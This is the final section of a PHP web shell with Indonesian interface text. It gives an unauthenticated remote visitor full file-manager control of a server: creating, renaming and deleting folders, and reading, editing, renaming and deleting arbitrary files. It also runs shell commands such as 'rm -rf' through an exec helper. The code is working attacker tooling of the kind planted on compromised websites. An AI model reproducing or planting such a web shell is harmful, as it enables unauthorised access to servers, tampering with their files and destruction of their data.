1756 elseif($_GET['act'] === 'newfolder') {
1757 if($_POST['save']) {
1758 $foldername = path().'/'.htmlspecialchars($_POST['foldername']);
1759 if(!@mkdir($foldername)) {
1760 $act = color(1, 1, "Permission Denied!");
1761 }
1762 else {
1763 $act = "<script>window.location='?dir=".path()."';</script>";
1764 }
1765 }
1766 print $act;
1767 print "<form method='post'>
1768 Nama Dir: <input type='text' name='foldername' style='width: 450px;' height='10'>
1769 <input type='submit' class='input' name='save' value='Buat Dir!'>
1770 </form>";
1771 }
1772 elseif($_GET['act'] === 'rename_folder') {
1773 if($_POST['save']) {
1774 $rename_folder = rename(path(), "".dirname(path()).DIRECTORY_SEPARATOR.htmlspecialchars($_POST['foldername']));
1775 if($rename_folder) {
1776 $act = "<script>window.location='?dir=".dirname(path())."';</script>";
1777 }
1778 else {
1779 $act = color(1, 1, "Permission Denied!");
1780 }
1781 print "$act<br>";
1782 }
1783 print "<form method='post'>
1784 <input type='text' value='".basename(path())."' name='foldername' style='width: 450px;' height='10'>
1785 <input type='submit' class='input' name='save' value='Ubah Nama!'>
1786 </form>";
1787 }
1788 elseif($_GET['act'] === 'delete_folder') {
1789 if(is_dir(path())) {
1790 if(is_writable(path())) {
1791 @rmdir(path());
1792 if(!@rmdir(path()) AND OS() === "Linux") @exe("rm -rf ".path());
1793 if(!@rmdir(path()) AND OS() === "Windows") @exe("rmdir /s /q ".path());
1794 $act = "<script>window.location='?dir=".dirname(path())."';</script>";
1795 }
1796 else {
1797 $act = color(1, 1, "Gak Bisa Hapus Dir!'".basename(path())."'");
1798 }
1799 }
1800 print $act;
1801 }
1802 elseif($_GET['act'] === 'view') {
1803 print "Nama File: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]<br>";
1804 print "[ <a href='?act=view&dir=".path()."&file=".$_GET['file']."'><b>Lihat</b></a> ] [ <a href='?act=edit&dir=".path()."&file=".$_GET['file']."'>Edit</a> ] [ <a href='?act=rename&dir=".path()."&file=".$_GET['file']."'>Ubah Nama</a> ] [ <a href='?act=download&dir=".path()."&file=".$_GET['file']."'>Download</a> ] [ <a href='?act=delete&dir=".path()."&file=".$_GET['file']."'>Hapus</a> ]<br>";
1805 print "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
1806 }
1807 elseif($_GET['act'] === 'edit') {
1808 if($_POST['save']) {
1809 $save = file_put_contents($_GET['file'], $_POST['src']);
1810 if($save) {
1811 $act = color(1, 2, "File Berhasil Disimpan!");
1812 }
1813 else {
1814 $act = color(1, 1, "Permission Denied!");
1815 }
1816 print "$act<br>";
1817 }
1818
1819 print "Nama File: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]<br>";
1820 print "[ <a href='?act=view&dir=".path()."&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=".path()."&file=".$_GET['file']."'><b>Edit</b></a> ] [ <a href='?act=rename&dir=".path()."&file=".$_GET['file']."'>Ubah Nama</a> ] [ <a href='?act=download&dir=".path()."&file=".$_GET['file']."'>Download</a> ] [ <a href='?act=delete&dir=".path()."&file=".$_GET['file']."'>Hapus</a> ]<br>";
1821 print "<form method='post'>
1822 <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
1823 <input type='submit' class='input' value='Simpan!' name='save' style='width: 500px;'>
1824 </form>";
1825 }
1826 elseif($_GET['act'] === 'rename') {
1827 if($_POST['save']) {
1828 $rename = rename($_GET['file'], path().DIRECTORY_SEPARATOR.htmlspecialchars($_POST['filename']));
1829 if($rename) {
1830 $act = "<script>window.location='?dir=".path()."';</script>";
1831 }
1832 else {
1833 $act = color(1, 1, "Permission Denied!");
1834 }
1835 print "$act<br>";
1836 }
1837
1838 print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]<br>";
1839 print "[ <a href='?act=view&dir=".path()."&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=".path()."&file=".$_GET['file']."'>Edit</a> ] [ <a href='?act=rename&dir=".path()."&file=".$_GET['file']."'><b>Ubah Nama</b></a> ] [ <a href='?act=download&dir=".path()."&file=".$_GET['file']."'>Download</a> ] [ <a href='?act=delete&dir=".path()."&file=".$_GET['file']."'>Hapus</a> ]<br>";
1840 print "<form method='post'>
1841 <input type='text' value='".basename($_GET['file'])."' name='filename' style='width: 450px;' height='10'>
1842 <input type='submit' class='input' name='save' value='Ubah Nama!'>
1843 </form>";
1844 }
1845 elseif($_GET['act'] === 'delete') {
1846 $delete = unlink($_GET['file']);
1847 if($delete) {
1848 $act = "<script>window.location='?dir=".path()."';</script>";
1849 }
1850 else {
1851 $act = color(1, 1, "Permission Denied!");
1852 }
1853 print $act;
1854 }
1855 }
1856 else {
1857 files_and_folder();
1858 }
1859}
1860
1861serverinfo();
1862action();
1863?>
1864</body>
1865</html>